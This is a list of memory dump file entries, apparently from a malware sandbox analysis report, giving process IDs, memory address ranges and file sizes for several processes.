                                                                            • memory/2188-52-0x00007FFB82410000-0x00007FFB8241F000-memory.dmp

                                                                              Filesize

                                                                              60KB

                                                                            • memory/2188-395-0x00007FFB78500000-0x00007FFB7867F000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/2188-444-0x00007FFB69540000-0x00007FFB69A73000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/2188-441-0x00007FFB7C720000-0x00007FFB7C72D000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/2188-442-0x00007FFB78CA0000-0x00007FFB78CD3000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/2188-443-0x00007FFB6E830000-0x00007FFB6E8FE000-memory.dmp

                                                                              Filesize

                                                                              824KB

                                                                            • memory/2188-361-0x00007FFB78CA0000-0x00007FFB78CD3000-memory.dmp

                                                                              Filesize

                                                                              204KB

                                                                            • memory/2188-364-0x00007FFB6E830000-0x00007FFB6E8FE000-memory.dmp

                                                                              Filesize

                                                                              824KB

                                                                            • memory/2188-365-0x00007FFB69540000-0x00007FFB69A73000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/2188-368-0x000001465B510000-0x000001465BA43000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/2188-440-0x00007FFB79010000-0x00007FFB79029000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/2188-125-0x000001465B510000-0x000001465BA43000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/2188-121-0x00007FFB6E830000-0x00007FFB6E8FE000-memory.dmp

                                                                              Filesize

                                                                              824KB

                                                                            • memory/2188-390-0x00007FFB7C8B0000-0x00007FFB7C8D5000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/2188-445-0x00007FFB777B0000-0x00007FFB777C4000-memory.dmp

                                                                              Filesize

                                                                              80KB

                                                                            • memory/2188-446-0x00007FFB79E10000-0x00007FFB79E1D000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/2188-447-0x00007FFB68F30000-0x00007FFB6904A000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/2188-448-0x00007FFB79120000-0x00007FFB7914C000-memory.dmp

                                                                              Filesize

                                                                              176KB

                                                                            • memory/2188-449-0x00007FFB78500000-0x00007FFB7867F000-memory.dmp

                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/2188-450-0x00007FFB82410000-0x00007FFB8241F000-memory.dmp

                                                                              Filesize

                                                                              60KB

                                                                            • memory/2188-451-0x00007FFB7C8B0000-0x00007FFB7C8D5000-memory.dmp

                                                                              Filesize

                                                                              148KB

                                                                            • memory/2188-452-0x00007FFB791C0000-0x00007FFB791D9000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/2188-453-0x00007FFB790F0000-0x00007FFB79114000-memory.dmp

                                                                              Filesize

                                                                              144KB

                                                                            • memory/2188-433-0x00007FFB69A80000-0x00007FFB6A141000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/2188-418-0x00007FFB69A80000-0x00007FFB6A141000-memory.dmp

                                                                              Filesize

                                                                              6.8MB

                                                                            • memory/3232-98-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                              Filesize

                                                                              124KB

                                                                            • memory/3232-39-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                              Filesize

                                                                              124KB

                                                                            • memory/3976-455-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                              Filesize

                                                                              124KB

                                                                            • memory/3976-89-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                              Filesize

                                                                              124KB

                                                                            • memory/4396-412-0x0000018C893F0000-0x0000018C893F1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/4396-416-0x0000018C893F0000-0x0000018C893F1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/4396-417-0x0000018C893F0000-0x0000018C893F1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/4396-415-0x0000018C893F0000-0x0000018C893F1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/4396-411-0x0000018C893F0000-0x0000018C893F1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/4396-413-0x0000018C893F0000-0x0000018C893F1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/4396-414-0x0000018C893F0000-0x0000018C893F1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/4396-407-0x0000018C893F0000-0x0000018C893F1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/4396-406-0x0000018C893F0000-0x0000018C893F1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/4396-405-0x0000018C893F0000-0x0000018C893F1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/4688-285-0x0000025420390000-0x0000025420398000-memory.dmp

                                                                              Filesize

                                                                              32KB

                                                                            • memory/5116-94-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                              Filesize

                                                                              124KB

                                                                            • memory/5116-96-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                              Filesize

                                                                              124KB